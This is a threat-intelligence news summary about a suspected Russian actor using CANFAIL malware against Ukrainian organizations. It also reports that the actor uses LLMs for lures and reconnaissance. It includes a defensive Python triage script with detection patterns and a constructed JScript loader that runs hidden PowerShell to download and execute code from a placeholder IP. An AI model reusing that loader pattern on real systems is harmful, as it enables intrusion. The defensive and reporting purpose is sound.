Google Ties Suspected Russian Actor to CANFAIL Malware Attacks on Ukrainian Orgs
Key Findings
Google Threat Intelligence Group (GTIG) has identified a previously undocumented threat actor, possibly affiliated with Russian intelligence services, that has been targeting Ukrainian organizations with the CANFAIL malware.
The threat actor has primarily targeted defense, military, government, and energy organizations at the Ukrainian national and regional level, but has also shown growing interest in aerospace, manufacturing with military or drone ties, nuclear and chemical research, and international organizations involved in conflict monitoring and humanitarian aid in Ukraine.
Despite being less sophisticated and less well resourced than other Russian threat groups, the actor has recently begun to overcome some of its technical limitations by leveraging large language models (LLMs) for reconnaissance, for generating social-engineering lures, and for answering basic technical questions that arise during post-compromise activity and command-and-control (C2) infrastructure setup.
Background
The threat actor has been conducting phishing campaigns, impersonating legitimate Ukrainian and Romanian energy organizations to obtain unauthorized access to organizational and personal email accounts.
The group has also masqueraded as a Romanian energy company that works with customers in Ukraine, in addition to targeting a Romanian firm and conducting reconnaissance on Moldovan organizations.
To enable its operations, the threat actor builds email address lists tailored to specific regions and industries based on its own research.
Attack Vectors
The attack chains use LLM-generated lures and embed Google Drive links pointing to a RAR archive that contains the CANFAIL malware, often disguised with a double extension (*.pdf.js) to pass it off as a PDF document. Because Windows Explorer hides known file extensions by default, such a file is displayed to the victim as a plain .pdf.
CANFAIL is obfuscated JavaScript that launches a PowerShell script; that script in turn downloads and executes a memory-only PowerShell dropper, so the next stage is never written to disk. In parallel, CANFAIL displays a fake "error" message to the victim to explain away the missing document.
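The following Python triage helper is an added example and not GTIG's tooling or CANFAIL's actual code. It demonstrates the two checks a defender would want against the delivery chain described above: flagging archive members whose name is a document extension followed by a script extension (the *.pdf.js disguise), and scoring a JScript body for signs of a PowerShell launcher (WScript.Shell, a hidden-window PowerShell invocation, download and in-memory execution primitives, a fake pop-up). The extension lists, indicator patterns, archive listing and loader snippet are all assumptions constructed for illustration; the normalisation step undoes two cheap obfuscations ("a"+"b" string splitting and String.fromCharCode) because the raw, unnormalised text would otherwise miss the word "powershell".

```python
"""Triage helper for a CANFAIL-style delivery chain.

Added illustration, not GTIG's or any vendor's code. Indicator lists and
sample inputs below are constructed assumptions, not real-world samples.
"""
import re

# Extensions Windows Script Host / mshta / cmd will execute (assumed list).
SCRIPT_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta", "ps1", "cmd", "bat", "scr", "lnk"}
# Extensions a user expects to open as a harmless document or image (assumed list).
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "rtf", "jpg", "png"}


def is_disguised_script(name: str) -> bool:
    """True for names such as 'Invoice.PDF.js' or 'scan.pdf .js'.

    Normalises case, stray spaces around dots and any directory prefix inside
    the archive. A bare single-extension '.js' is not flagged here: it is
    suspicious too, but it is not the double-extension disguise discussed above.
    """
    base = name.replace("\\", "/").rsplit("/", 1)[-1].strip().lower()
    parts = [p.strip() for p in base.split(".") if p.strip()]
    if len(parts) < 3:  # need stem + document extension + script extension
        return False
    return parts[-1] in SCRIPT_EXTS and parts[-2] in DOC_EXTS


def triage_listing(names):
    """Return the archive members whose names look like disguised scripts."""
    return [n for n in names if is_disguised_script(n)]


# Indicators of a JScript loader that shells out to PowerShell (assumed, illustrative).
PS_LAUNCH_INDICATORS = {
    "wscript_shell": re.compile(r"activexobject\s*\(\s*['\"]wscript\.shell['\"]", re.I),
    "powershell": re.compile(r"powershell(\.exe)?", re.I),
    "stealth_flags": re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noni\b", re.I),
    "encoded_cmd": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(r"downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "fake_error": re.compile(r"\.popup\s*\(|msgbox|showmessage", re.I),
}


def normalise_js(js: str) -> str:
    """Undo two cheap obfuscations before matching.

    1. "pow" + "ershell"  ->  "powershell"   (same quote type on both sides)
    2. String.fromCharCode(69,114,...)  ->  the decoded characters
    Real samples use far more than this; treat the result as a first pass only.
    """
    js = re.sub(r"""(['"])\s*\+\s*\1""", "", js)

    def _decode(m):
        return "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1)))

    return re.sub(r"String\.fromCharCode\s*\(([\d,\s]+)\)", _decode, js)


def score_js(js: str):
    """Return (score, sorted indicator names) for the indicators that fire."""
    hits = sorted(k for k, rx in PS_LAUNCH_INDICATORS.items() if rx.search(js))
    return len(hits), hits


# Constructed archive listing: not a real CANFAIL sample.
SAMPLE_LISTING = [
    "Contract_2026/Energy_Tender.pdf.js",
    "Contract_2026/Energy_Tender.pdf",
    "photos/site.JPG.hta",
    "notes.txt",
    "backup.tar.gz",
]

# Constructed stand-in for an obfuscated loader; 203.0.113.5 is a documentation address.
SAMPLE_JS = r'''
var s = new ActiveXObject("WScript.Shell");
var c = "pow" + "ersh" + "ell.exe -nop -w hidden -c \"IEX((New-Object Net.WebClient)" +
        ".DownloadString('http://203.0.113.5/stage2'))\"";
s.Run(c, 0, false);
s.Popup(String.fromCharCode(69,114,114,111,114) + ": file is corrupted", 0, "Adobe Reader", 16);
'''

if __name__ == "__main__":
    print("disguised members:", triage_listing(SAMPLE_LISTING))
    print("raw score:", score_js(SAMPLE_JS))
    print("normalised score:", score_js(normalise_js(SAMPLE_JS)))
```

On the constructed sample the raw text fires five indicators; after normalisation the split string "pow" + "ersh" + "ell.exe" reassembles and the "powershell" indicator fires as well, for six. The scoring is a triage signal for sorting attachments, not a standalone detection: a loader that builds every string from character codes or decodes itself at runtime will defeat these regexes, which is why the memory-only stage described above is better caught by PowerShell script-block logging and AMSI than by static inspection of the dropper.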
Linked Campaigns
The threat actor is also linked to a campaign called PhantomCaptcha, which was disclosed by SentinelOne SentinelLABS in October 2025. This campaign targeted organizations associated with Ukraine's war relief efforts through phishing emails that directed recipients to fake pages hosting ClickFix-style instructions to activate the infection sequence and deliver a WebSocket-based trojan.
Other Russian Threat Groups
GTIG has observed other Russian espionage groups, such as APT44 (Sandworm/FROZENBARENTS), TEMP.Vermin, UNC5125, UNC5792, UNC4221, UNC5976, and UNC6096, targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures.
These groups have employed a variety of malware, including WAVESIGN, INFAMOUSCHISEL, VERMONSTER, SPECTRUM, MESSYFORK, GREYBATTLE, STALECOOKIE, TINYWHALE, and CraxsRAT, to steal information and hijack secure messaging accounts used by the Ukrainian military.
Sources
https://thehackernews.com/2026/02/google-ties-suspected-russian-actor-to.html
https://securityaffairs.com/187976/hacking/suspected-russian-hackers-deploy-canfail-malware-against-ukraine.html
https://x.com/xcybersecnews/status/2022448392949911781
https://www.news4hackers.com/google-links-russian-actor-to-canfail-malware-attacks-on-ukrainian-organizations/
https://x.com/TheCyberSecHub/status/2022363721679671428
https://x.com/shah_sheikh/status/2022363723936207012